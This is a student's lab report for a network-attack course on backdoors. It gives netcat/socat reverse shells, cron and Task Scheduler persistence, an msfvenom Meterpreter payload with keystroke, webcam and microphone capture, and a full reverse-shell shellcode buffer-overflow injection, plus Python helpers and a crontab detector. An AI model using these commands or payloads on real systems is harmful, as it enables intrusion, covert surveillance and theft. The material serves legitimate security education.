2019-2020-2 20175322 Zhou Yihong "Network Warfare Technology" Exp2: Backdoor Principles and Practice


1. Backdoor concept

  • A backdoor is a way into a system that bypasses the normal authentication process and the normal access channels.

2. Common backdoors

2.1 nc or netcat

2.1.1 Windows obtains a Linux shell

  • On Windows, use ipconfig to view the local IP (192.168.132.1 here).

  • Start a listener with ncat.exe -l -p 5322, and check that Windows and Linux can reach each other (ping in both directions).

  • On Kali, connect back to Windows with ncat 192.168.132.1 5322 -e /bin/sh. The -e option attaches the given program to the connection, so everything typed on the Windows side is executed by /bin/sh on Kali. Note that the OpenBSD nc shipped by many distributions has no -e; use ncat or netcat-traditional.

  • Windows now has a Linux shell and can run any command, e.g. ls.

2.1.2 Linux obtains a Windows shell

  • On Kali, install net-tools first so that the ifconfig command can be used to view the IP (192.168.132.138 here); ip addr works without it.

  • Start a listener: nc -l -p 5322

  • On Windows, connect back to Kali: ncat.exe -e cmd.exe 192.168.132.138 5322

  • Kali now has a Windows command prompt.

* 2.1.3 Mac obtains a Windows shell

* 2.1.4 Windows obtains a Mac shell

* 2.1.5 Mac obtains a Linux shell

* 2.1.6 Linux obtains a Mac shell

2.1.7 Netcat: further uses

Transmitting data with nc

  • On Windows, listen on port 5322: ncat.exe -l 5322
  • On Kali, connect to Windows port 5322: nc 192.168.132.1 5322
  • Once the connection is established, both sides can send text to each other; nc simply copies stdin to the socket and the socket to stdout.

Transferring a file with nc (from Kali to Windows)

  • On Windows, listen on port 5322 and redirect everything received into file1.out: ncat.exe -l 5322 > file1.out
  • On Kali, connect to Windows port 5322 and feed the file on stdin: nc 192.168.132.1 5322 < file1.in
  • Once the connection is established, Windows receives the file sent by Kali. nc adds no length header and no checksum: the receiver only knows the file is complete when the sender closes the connection, so compare a hash afterwards (sha256sum on Kali, certutil -hashfile on Windows).
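As an added example (not part of the original report), the same transfer reproduced on 127.0.0.1 with Python sockets, together with the integrity check that nc itself does not provide. The sample file content is constructed, the port is chosen by the kernel, and the function names are this example's own.

```python
"""`ncat -l PORT > file1.out` <-> `nc HOST PORT < file1.in` on the loopback
interface, followed by a hash comparison. Added example, not report code."""
import hashlib
import os
import socket
import tempfile
import threading

# Constructed sample content standing in for file1.in (about 100 KB, so the
# transfer spans several send/recv calls rather than a single segment).
SAMPLE_DATA = b"constructed sample payload\n" * 4000


def send_file(host, port, path):
    """Sender side, equivalent to `nc host port < file`: stream the file, then
    half-close the connection. That shutdown is what tells the receiver the
    file has ended; there is no length header."""
    with socket.create_connection((host, port)) as sock, open(path, "rb") as f:
        while True:
            chunk = f.read(65536)
            if not chunk:
                break
            sock.sendall(chunk)
        sock.shutdown(socket.SHUT_WR)


def receive_file(listen_sock, out_path):
    """Receiver side, equivalent to `ncat -l port > file`: accept one
    connection and write everything received until the peer closes."""
    conn, _ = listen_sock.accept()
    conn.settimeout(10)
    with conn, open(out_path, "wb") as f:
        while True:
            chunk = conn.recv(65536)
            if not chunk:
                break
            f.write(chunk)


def sha256_of(path):
    """The check nc does not do: a hash to compare on both ends (sha256sum on
    Kali, `certutil -hashfile <file> SHA256` on Windows)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def transfer_and_verify(src_path, dst_path):
    """Run receiver and sender on 127.0.0.1; return (hashes match, src hash, dst hash)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.settimeout(10)
    srv.bind(("127.0.0.1", 0))       # port 0: the kernel picks a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    receiver = threading.Thread(target=receive_file, args=(srv, dst_path))
    receiver.start()
    send_file("127.0.0.1", port, src_path)
    receiver.join(10)
    srv.close()
    src_hash, dst_hash = sha256_of(src_path), sha256_of(dst_path)
    return src_hash == dst_hash, src_hash, dst_hash


def demo():
    """Write file1.in, transfer it to file1.out; return (ok, received size, expected size)."""
    with tempfile.TemporaryDirectory() as d:
        src, dst = os.path.join(d, "file1.in"), os.path.join(d, "file1.out")
        with open(src, "wb") as f:
            f.write(SAMPLE_DATA)
        ok, _, _ = transfer_and_verify(src, dst)
        return ok, os.path.getsize(dst), len(SAMPLE_DATA)


if __name__ == "__main__":
    print(demo())
```

Note the SHUT_WR in the sender: with the real tools, if the sending nc does not close after stdin is exhausted (the OpenBSD nc needs -q or -N for that), the receiver keeps waiting and the output file looks complete but the connection never ends.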

2.2 Meterpreter

  • Meterpreter is a backdoor program (the payload that Metasploit runs on the compromised host).
  • The traditional model was: someone writes a backdoor, and everyone else makes use of it.
  • Later, some capable people wanted a platform that generates backdoors instead. In such a platform the backdoor's
    • basic functions (basic connectivity, executing commands),
    • extensions (collecting user information, installing services, and so on),
    • encoding scheme,
    • target platform,
    • and run-time parameters
  • are partly or entirely adjustable. Combining them as needed produces an executable file.
  • A typical generator of this kind (msfvenom) takes the following parameters:
    • -p the payload to use; "payload" means what is delivered. Here windows/meterpreter/reverse_tcp is a piece of shellcode.
    • -x the executable file to use as a template; the payload (shellcode) is written into this executable.
    • -e the encoder to use, which transforms the shellcode in order to evade anti-virus.
    • -i the number of encoder iterations, e.g. -i 5 applies the encoder above 5 times.
    • -b bad characters that must not appear in the payload.
    • LHOST the IP to connect back to.
    • LPORT the port to connect back to.
    • -f the output format.
    • > the file to write the output to (-o also works).

3. Starting the backdoor

3.1 netcat obtains the host's shell, started by cron

  • Run crontab -e to add a scheduled task; -e means edit. Since this is the first time, it prompts for an editor; 3 was chosen here.
  • Append the line 58 * * * * /bin/netcat 192.168.132.1 5322 -e /bin/sh, which means: at minute 58 of every hour, connect back to the Windows host on port 5322 with /bin/sh attached.

  • At minute 58, Linux connects to Windows. This is a reverse-connecting backdoor: once the listener on Windows accepts the connection, the shell is available there.

3.2 socat obtains the host's shell, started by a scheduled task

  • Right-click 我的电脑 (This PC) and click 管理 (Manage).
  • Click 任务计划程序 (Task Scheduler), then 创建任务 (Create Task).

  • Fill in the task name and create a new trigger (a time of 21:25 was used here).

  • Create a new action: for "program or script" select the path of socat.exe, and in the "add arguments" box enter tcp-listen:5322 exec:cmd.exe,pty,stderr

  • After creation the task shows as Ready.

  • When 21:25 arrives (after the machine has been turned on again), the task can be seen as Running.

  • A cmd window pops up on the Windows host by itself.

  • On Kali enter socat - tcp:192.168.132.1:5322 to complete the connection and obtain the Windows shell.

3.3 Use MSF meterpreter (or other software) to generate an executable file, transfer it to the host with ncat or socat, run it on the host and obtain its shell

  • On Linux, generate the backdoor with msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.132.138 LPORT=5322 -f exe > backdoor5322.exe

  • On Windows, run ncat.exe -lv 5322 > backdoor5322.exe; -v prints the connection status. Windows Defender real-time protection will normally quarantine an unencoded Meterpreter executable as soon as it is written, so it has to be turned off on the lab VM for this step.

  • On Linux, send the backdoor with nc 192.168.132.1 5322 < backdoor5322.exe; Windows prints a message once the transfer has succeeded.

  • The file is sent and received successfully.

  • On Linux, run msfconsole to enter the MSF console and type the following commands:
use exploit/multi/handler                       (load the generic listener module)
set payload windows/meterpreter/reverse_tcp     (the same payload used when generating the backdoor)
set LHOST 192.168.132.138                       (the Linux IP address)
set LPORT 5322                                  (the same port)
show options                                    (check the settings)
  • After entering the msf console:

  • After entering the commands:

  • On Linux, run exploit to start listening, then run the backdoor on Windows; Linux obtains the Windows shell.

3.4 Use MSF meterpreter (or other software) to capture audio, camera images, keystrokes, etc. from the target host, and try privilege escalation

  • record_mic records a piece of audio from the microphone.

  • webcam_snap takes a picture with the camera.

  • keyscan_start begins recording keystrokes; keyscan_dump reads the recorded keystrokes.

  • screenshot captures the screen.

  • getuid shows the current user; getsystem attempts to escalate to SYSTEM. It only succeeds when the session already runs with administrator rights (or a usable token); from a limited user it reports failure.

3.5 Optional: generate shellcode with MSF, inject it into pwn1 from Exp1, and obtain a reverse-connecting shell

  • Search the Exploit DataBase for a linux/x86 reverse shellcode, download it and extract the reverse-connecting machine code from it:
\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80
  • On Linux, run echo "0" > /proc/sys/kernel/randomize_va_space (as root) to disable address-space randomization, so that the stack address found in gdb is the same on the next run.

  • Use perl with output redirection (>) to store the generated string in the file input_shellcode:
perl -e 'print "A"x 32;print"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode

  • Open a terminal and run (cat input_shellcode;cat) | ./pwn1 to inject this buffer. Then open another terminal, use ps -ef | grep pwn1 to find the pwn1 process ID, start gdb and attach to that PID with attach, use disassemble foo to find the address of its ret instruction, set a breakpoint there, press Enter in the first terminal, and then enter c in gdb to continue.

  • Use info r esp to see where the stack pointer is, and view the data stored at that address.

The return-address slot is at 0xffffd38c, so the shellcode address is 0xffffd38c+4, i.e. 0xffffd390.

  • Open the msf console in another terminal and start listening. The shellcode above has its target hard-coded: the pushed bytes \x11\x5c are port 0x115c = 4444, and \x80\xff\xff\xfe xored with \xff\xff\xff\xff is 0x0100007f, i.e. 127.0.0.1, so the listener must be on 127.0.0.1 port 4444 (or those bytes must be changed before use).
  • In another terminal modify input_shellcode so that the four bytes that land on the return address hold 0xffffd390 in little-endian order, i.e. "A"x32, then \x90\xd3\xff\xff, then the shellcode, and run (cat input_shellcode;cat) | ./pwn1 again.

  • The listening terminal obtains a shell.
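To make the checks in this step concrete, here is an added Python example (not part of the original report). It parses the shellcode string quoted above from its \xNN text form, verifies that it contains no byte that would cut the input short (0x00, and 0x0a on the assumption, which is this example's and not the report's, that pwn1 reads the buffer with a gets()-style call), recovers the IP and port hard-coded in the shellcode's sockaddr_in so the listener is started in the right place, and assembles the final input_shellcode layout: 32 filler bytes, the 4-byte little-endian address 0xffffd390, then the shellcode. The function names are this example's own.

```python
"""Pre-flight checks on the Exploit-DB linux/x86 reverse shellcode used in 3.5
and construction of the input file. Added example, not code from the report."""
import struct

# The shellcode exactly as quoted in the report, in \xNN text form.
SHELLCODE_ESCAPED = (
    r"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3"
    r"\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10"
    r"\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f"
    r"\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
    r"\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"
)

# Bytes that would end the injected input early (assumption: pwn1 reads with a
# gets()-style call, so 0x0a ends the line; 0x00 ends any C string copy).
BAD_CHARS = b"\x00\x0a"


def unescape(text):
    """Turn the \\xNN text form (as pasted into the perl command) into raw bytes."""
    return bytes.fromhex(text.replace("\\x", ""))


def find_bad_chars(shellcode, bad=BAD_CHARS):
    """Return [(offset, byte)] for every occurrence of a bad character."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def connect_target(shellcode):
    """Recover the hard-coded IP and port from the sockaddr_in construction:
         66 68 HH LL      push word  -> sin_port, already in network byte order
         b8 xx xx xx xx   mov eax, imm32
         83 f0 ff         xor eax, -1  (the address is stored inverted so the
                                        0x7f 00 00 01 of 127.0.0.1 has no NUL)
         50               push eax   -> sin_addr in memory order
    """
    i = shellcode.index(b"\x66\x68")                 # first "push word" in the code
    port = int.from_bytes(shellcode[i + 2:i + 4], "big")
    j = shellcode.index(b"\x83\xf0\xff")             # the xor eax,-1
    if shellcode[j - 5] != 0xB8:
        raise ValueError("expected mov eax, imm32 before xor eax,-1")
    imm = struct.unpack("<I", shellcode[j - 4:j])[0] ^ 0xFFFFFFFF
    ip = ".".join(str(b) for b in struct.pack("<I", imm))
    return ip, port


def build_input(shellcode, ret_addr, padding=32):
    """Layout found with gdb in the report: 32 filler bytes overwrite up to the
    saved return address, the next 4 bytes replace it with the address of the
    slot just after it (esp after ret), and the shellcode sits at that slot."""
    return b"A" * padding + struct.pack("<I", ret_addr) + shellcode


def analyse(ret_addr=0xFFFFD390):
    """Run all checks on the report's shellcode and build input_shellcode."""
    sc = unescape(SHELLCODE_ESCAPED)
    return {
        "length": len(sc),
        "bad_chars": find_bad_chars(sc),
        "target": connect_target(sc),
        "input": build_input(sc, ret_addr),
    }


if __name__ == "__main__":
    result = analyse()
    print("shellcode length:", result["length"])
    print("bad characters  :", result["bad_chars"] or "none")
    print("connects back to:", "%s:%d" % result["target"])
    with open("input_shellcode", "wb") as f:   # same file name as in the report
        f.write(result["input"])
```

Running it reports that the shellcode is 96 bytes, free of 0x00 and 0x0a, and connects to 127.0.0.1:4444, which is why the listener in the last step has to sit on that address and port; if the target should be another machine, the two words after \x66\x68 and the four bytes after \xb8 must be changed (with the IP still inverted) and the bad-character check re-run.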

4. Thoughts and gains

  • The experiment is relatively simple but quite time-consuming. The bonus items could draw on the procedure of the previous experiment, and there was not much difficulty throughout. Through this experiment I understood the basic principles of backdoors, gained hands-on experience, felt the danger of backdoors, and I hope to learn more in the future learning process.

5. Questions answered

  • (1) Think of possible ways a backdoor could get into your system.
    • Downloading applications from unofficial websites; such programs may be bundled with certain executable files that leave a backdoor. After clicking a phishing link, an executable file may be downloaded to the computer and leave a backdoor.
  • (2) Give examples of ways a backdoor can be started (Windows and Linux).
    • Linux: crontab scheduled start; shellcode injection.
    • Windows: a new Task Scheduler task; modifying a registry key so the backdoor starts with the system; the user running a file that carries the backdoor.
  • (3) Which Meterpreter function impressed you most?
    • By controlling the backdoor shell on the host, the target host's audio, camera, keystroke recording and other functions can be obtained.
  • (4) How can you find out whether a backdoor has been installed on your system?
    • Use security software to scan the system regularly and remove malicious files.
    • Use Task Manager and other system tools to check the background for abnormal programs.
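For the Linux side of this answer, here is an added Python example (not part of the original report) that checks for the persistence mechanism used in section 3.1: it parses crontab-format lines and flags commands that bind a shell to a network connection. The sample crontab contents are constructed for the example (the report's own 58 * * * * entry is included verbatim), and the patterns are this example's own heuristics, not a complete list.

```python
"""Scan crontab-format text for reverse-shell style entries.
Added example, not code from the lab report."""
import re

# Heuristics for commands that bind a shell to a network connection. These are
# this example's assumptions about what a cron backdoor looks like.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\b(nc|netcat|ncat)\b.*\s-[A-Za-z]*e\b"), "netcat with -e (program bound to socket)"),
    (re.compile(r"\bsocat\b.*\bexec:"), "socat relaying a socket to exec:"),
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp reverse shell"),
    (re.compile(r"\b(python|perl|ruby|php)[0-9.]*\s+-[ce]\b.*\b(socket|connect)\b"),
     "scripting one-liner opening a socket"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download piped into a shell"),
]

_ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_cron_line(line, system=False):
    """Split one crontab line into (schedule, user, command), or None for
    blank lines, comments, environment assignments and malformed lines.
    system=True means /etc/crontab or /etc/cron.d format, which has an extra
    user field between the schedule and the command."""
    line = line.strip()
    if not line or line.startswith("#") or _ENV_LINE.match(line):
        return None
    n_sched = 1 if line.startswith("@") else 5      # @reboot/@daily vs. 5 time fields
    n_fields = n_sched + (1 if system else 0)
    parts = line.split(None, n_fields)
    if len(parts) <= n_fields:
        return None
    schedule = " ".join(parts[:n_sched])
    user = parts[n_sched] if system else None
    return schedule, user, parts[n_fields]


def scan_crontab(text, system=False):
    """Return a list of findings, one per line whose command matches a pattern."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        parsed = parse_cron_line(raw, system)
        if parsed is None:
            continue
        schedule, user, command = parsed
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if pattern.search(command):
                findings.append({"line": lineno, "schedule": schedule, "user": user,
                                 "command": command, "reason": reason})
                break
    return findings


# Constructed sample of a user crontab (`crontab -l`); line 4 is the report's entry.
SAMPLE_USER_CRONTAB = """\
# m h  dom mon dow   command
MAILTO=""
0 3 * * * /usr/bin/backup.sh >/dev/null 2>&1
58 * * * * /bin/netcat 192.168.132.1 5322 -e /bin/sh
@reboot bash -c 'bash -i >& /dev/tcp/192.168.132.1/5322 0>&1'
*/10 * * * * socat tcp:192.168.132.1:5322 exec:/bin/sh,pty,stderr
"""

# Constructed sample in /etc/crontab format (extra user field).
SAMPLE_SYSTEM_CRONTAB = """\
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
@reboot www-data /usr/bin/python3 -c 'import socket,subprocess; s=socket.create_connection(("192.168.132.1",5322))'
"""


if __name__ == "__main__":
    for name, text, system in (("user crontab", SAMPLE_USER_CRONTAB, False),
                               ("system crontab", SAMPLE_SYSTEM_CRONTAB, True)):
        for f in scan_crontab(text, system):
            who = f["user"] or "(owner)"
            print("%s line %d [%s] %s: %s -> %s" % (name, f["line"], f["schedule"], who,
                                                   f["command"], f["reason"]))
```

On a real host, feed it crontab -l for every user (system=False) and the contents of /etc/crontab and /etc/cron.d/* (system=True). Cron is only one of the start-up paths listed in answer (2): scripts under /etc/cron.hourly and similar, systemd timers and user shell profiles need their own checks, and on Windows the equivalent is listing scheduled tasks and Run registry keys.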


Origin www.cnblogs.com/zyh5322/p/12516752.html